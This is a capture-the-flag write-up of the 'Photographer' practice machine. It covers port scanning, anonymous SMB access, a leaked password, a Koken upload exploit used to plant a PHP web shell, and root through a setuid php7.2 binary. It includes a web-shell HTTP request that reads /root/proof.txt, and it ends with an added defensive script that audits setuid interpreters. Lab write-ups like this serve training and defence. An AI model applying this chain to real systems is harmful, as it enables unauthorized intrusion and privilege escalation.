I started my OSCP journey a while ago and wanted to try the PG machines; this is the first one I've tried. The machine is fairly straightforward and is labeled easy.

I started with a simple nmap scan, which hinted that this Linux machine is part of an Active Directory.
```
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 414daa1886948e88a74c6b426076f14f (RSA)
|   256 4da3d07a8f64ef82452d011318b7e013 (ECDSA)
|_  256 1a017a4fcf9585bf31a14f1587ab94e2 (ED25519)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Photographer by v1n1v131r4
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: daisa ahomi
|_http-generator: Koken 0.22.24
Service Info: Host: PHOTOGRAPHER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
On port 80 we have a simple web page which is more or less just a placeholder from a template, but on port 8000 we have a functional website built with Koken. Fingerprinting both ports confirms the versions:

```
# Versions for :80
http://192.168.160.76:80/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.160.76], JQuery, Script, Title[Photographer by v1n1v131r4]
# Versions for :8000
http://192.168.160.76:8000/ [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.160.76], JQuery[1.12.4], Meta-Author[daisa ahomi], MetaGenerator[Koken 0.22.24], Script, Title[daisa ahomi], X-UA-Compatible[IE=edge]
```
I immediately searched for exploits for Koken 0.22.24 and found this one: https://www.exploit-db.com/exploits/48706. It is an authenticated exploit, so it hinted that I had to look further to get some credentials.
Upon scanning the Active Directory side (ports 139 and 445) I found public shares, one of which was non-default:

```
$ smbclient -N -L 192.168.160.76

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	sambashare      Disk      Samba on Ubuntu
	IPC$            IPC       IPC Service (photographer server (Samba, Ubuntu))
```
I explored it and found two files: one was an email in txt format and the other one was a zipped WordPress site. I scanned the WordPress source code with gf (https://github.com/tomnomnom/gf) but found nothing. The mail, though, had an interesting text inside that hinted at two users and a suggestion for a password.
email@example.com - Agi Clarence
firstname.lastname@example.org - Daisa Ahomi
I found the password for the user email@example.com in the content of the mail. (It is very simple!)
After that, I logged into Koken's admin panel and uploaded a simple PHP shell using the previously mentioned exploit. I could then read the user's local.txt file, which yielded the user flag.
Root was pretty straightforward: scanning for SUID binaries showed that /usr/bin/php7.2 had the SUID bit set, and a single request through the already active web shell yielded the root flag.

```
GET /storage/originals/4f/38/image.php?cmd=/usr/bin/php7.2+-r+'readfile("/root/proof.txt")%3b' HTTP/1.1
Host: 192.168.210.76:8000
Upgrade-Insecure-Requests: 1
User-Agent: ...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: koken_session_ci=...
Connection: close
```
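Added example, mine rather than the author's: a small POSIX shell audit for the misconfiguration that gave root here, an interpreter such as /usr/bin/php7.2 carrying the setuid bit. It lists setuid files under a directory and flags interpreters, whose bit should be dropped with chmod u-s; the interpreter name list is my assumption.

```shell
#!/bin/sh
# Added audit helper, not part of the original write-up.
# Lists every file with the setuid bit under a directory and flags the ones
# that are script interpreters or shells (like /usr/bin/php7.2 on this box):
# a setuid interpreter runs arbitrary code as its owner, so the fix is
# "chmod u-s <file>". The interpreter name list is an assumption; extend it
# for the interpreters installed on the host being audited.

# Basenames that must never carry setuid: interpreter name plus an optional
# version suffix (php, php7.2, python3.10, ...). "shutdown" does not match.
INTERPRETER_PATTERN='^(php|python|perl|ruby|node|lua|bash|dash|zsh|sh)[0-9.]*$'

# is_interpreter PATH -> exit status 0 when PATH's basename is an interpreter
is_interpreter() {
    basename "$1" | grep -Eq "$INTERPRETER_PATTERN"
}

# audit_suid_dir DIR -> prints one line per setuid file under DIR:
#   "INTERPRETER <path>"  setuid interpreter, remove the bit (chmod u-s)
#   "SUID <path>"         other setuid file, compare with the distro baseline
# Exit status 1 when at least one setuid interpreter was found, else 0.
audit_suid_dir() {
    dir=$1
    found=0
    old_ifs=$IFS
    # split find's output on newlines only, so paths with spaces survive
    IFS='
'
    for f in $(find "$dir" -type f -perm -4000 2>/dev/null | sort); do
        if is_interpreter "$f"; then
            printf 'INTERPRETER %s\n' "$f"
            found=1
        else
            printf 'SUID %s\n' "$f"
        fi
    done
    IFS=$old_ifs
    return $found
}

# Whole-system run, as one would do on the box above:
#   audit_suid_dir / ; echo "status: $?"
```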